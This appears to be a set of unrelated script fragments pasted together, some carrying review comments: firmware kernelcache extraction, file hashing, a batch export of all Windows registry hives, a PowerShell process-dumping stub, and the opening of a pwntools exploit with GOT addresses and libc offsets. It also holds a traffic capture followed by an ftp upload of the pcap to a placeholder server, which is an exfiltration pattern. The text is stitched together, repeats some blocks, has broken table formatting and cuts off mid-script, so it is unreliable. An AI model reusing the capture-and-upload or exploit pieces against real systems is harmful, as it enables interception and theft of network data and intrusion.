# NOTE(review): as written this first line is a bare path, not a command; bash
# will try to execute /var/profile (error if absent or not executable) and then
# carry on, since nothing sets -e. Presumably a stray line or the file this
# snippet was meant to operate on -- confirm what it was intended to be.
/var/profile
# Print the MD5 of every regular file under /var (BSD/macOS `md5`; GNU systems
# ship `md5sum` instead). `\;` spawns one md5 process per file.
# NOTE(review): MD5 is fine as a quick change-detection baseline but is not
# collision-resistant; use a SHA-2 digest if these hashes are to serve as
# integrity evidence.
find /var/ -type f -exec md5 {} \;
  
    
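# Pull the kernelcache out of every firmware archive under the current
# directory into a sibling "<archive>.d" directory.
# find -print0 + read -d '' keeps paths containing spaces or glob characters
# intact; the original `for f in $(find ...)` word-split and globbed them.
while IFS= read -r -d '' f; do
  # -o overwrites an existing extraction without prompting.
  unzip -o "$f" "kernelcache.*" -d "$f.d"
done < <(find . -name "*.ipsw" -print0)
# Compressed kernelcaches still to decode; already-decoded ".dec" outputs are
# skipped. Kept as a whitespace-separated string because the loop that follows
# iterates `$kernels` unquoted.
kernels=$(find . -name "kernelcache.*" -not -name "*.dec")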
| for k in $kernels;do | |
| offset=$(LANG=C grep -obUaP "\xff\xcf\xfa\xed" $k | head -n1 | cut -d':' -f1) | |
| ./lzssdec -o $offset < $k > $k.dec | |
| echo $offset | 
  
    
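#!/usr/bin/env bash
# ------------------------------------------------------------
# -- Setup parameters
# ------------------------------------------------------------
# The target directory is required as the first argument. "$1" is quoted so
# the test stays well-formed when the argument contains spaces (unquoted, an
# argument like "a b" made `[ -z a b ]` an error). The usage message goes to
# stderr and the script exits non-zero so callers can detect the misuse; the
# original `exit;` returned 0 on a usage error.
if [[ -z "$1" ]]; then
  echo "usage: $0 <dir_name>" >&2
  exit 1
fi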
  
    
  | @echo off | |
| setlocal | |
| set BackupFolder=C:\Temp | |
| if not exist "%BackupFolder%" md "%BackupFolder%" | |
| for %%a in (HKLM HKCU HKCR HKU HKCC) do ( | |
| echo Exporting %%a to %BackupFolder%\%%a.reg ... | |
| reg.exe export "%%a" "%BackupFolder%\%%a.reg" /y | |
| ) | |
| echo Exporting hosts file ... | 
  
    
REM Capture 60 seconds of traffic on the "Wi-Fi" interface into .\test.pcap.
"C:\Program Files\Wireshark\dumpcap.exe" -i "Wi-Fi" -a duration:60 -w ./test.pcap
REM NOTE(review): ftp's -s: option names a *command script*, not the file to
REM upload, so this line feeds the raw pcap bytes to ftp as commands rather
REM than sending the file. Presumably a script with `put test.pcap` was
REM intended -- confirm.
REM NOTE(review): plain FTP carries the login and the capture in cleartext,
REM and the pcap itself holds whatever crossed the interface, possibly
REM credentials or session material; prefer SFTP/SCP or another encrypted
REM upload path.
ftp -s:test.pcap <SERVERDOMAIN.COM>
  
    
  | #!/usr/bin/env python | |
| import os | |
| import zipfile | |
| from shutil import copyfile | |
| #Process list | |
| #PCAP | |
| #local.host | |
# Working directory for this run; the merged capture always lives at
# "<base_dir>/all.pcap".
base_dir = "./base"
pcap_path = "%s/all.pcap" % base_dir
  
    
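#!/usr/bin/env bash
# ------------------------------------------------------------
# -- Setup parameters
# ------------------------------------------------------------
# The target directory is required as the first argument. "$1" is quoted so
# the test stays well-formed when the argument contains spaces (unquoted, an
# argument like "a b" made `[ -z a b ]` an error). The usage message goes to
# stderr and the script exits non-zero so callers can detect the misuse; the
# original `exit;` returned 0 on a usage error.
if [[ -z "$1" ]]; then
  echo "usage: $0 <dir_name>" >&2
  exit 1
fi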
  
    
  | function Get-StapSuspects(){ | |
| <# | |
| .SYNOPSIS | |
| Dump process binary which connect to specific domain by SystemTap | |
| .DESCRIPTION | |
| Dump process binary which connect to specific domain by SystemTap | |
| .PARAMETER RemoteHostName | |
| Domain list you want to check | 
  
    
  | from pwn import * | |
| import time | |
# GOT slots in the target binary. These are absolute addresses, so the binary
# is presumably loaded at a fixed base -- verify with `objdump -R` / `readelf -r`
# against the exact build being attacked.
atoi_got = 0x601050
puts_got = 0x601018
sleep_got = 0x601060
setvbuf_got = 0x601048
exit_got = 0x601058
# Offsets of setvbuf and sleep inside libc, presumably taken from the remote
# target's libc build; they are only valid for that exact build -- TODO confirm.
setvbuf_offset = 0x6FE70
sleep_offset = 0xCC230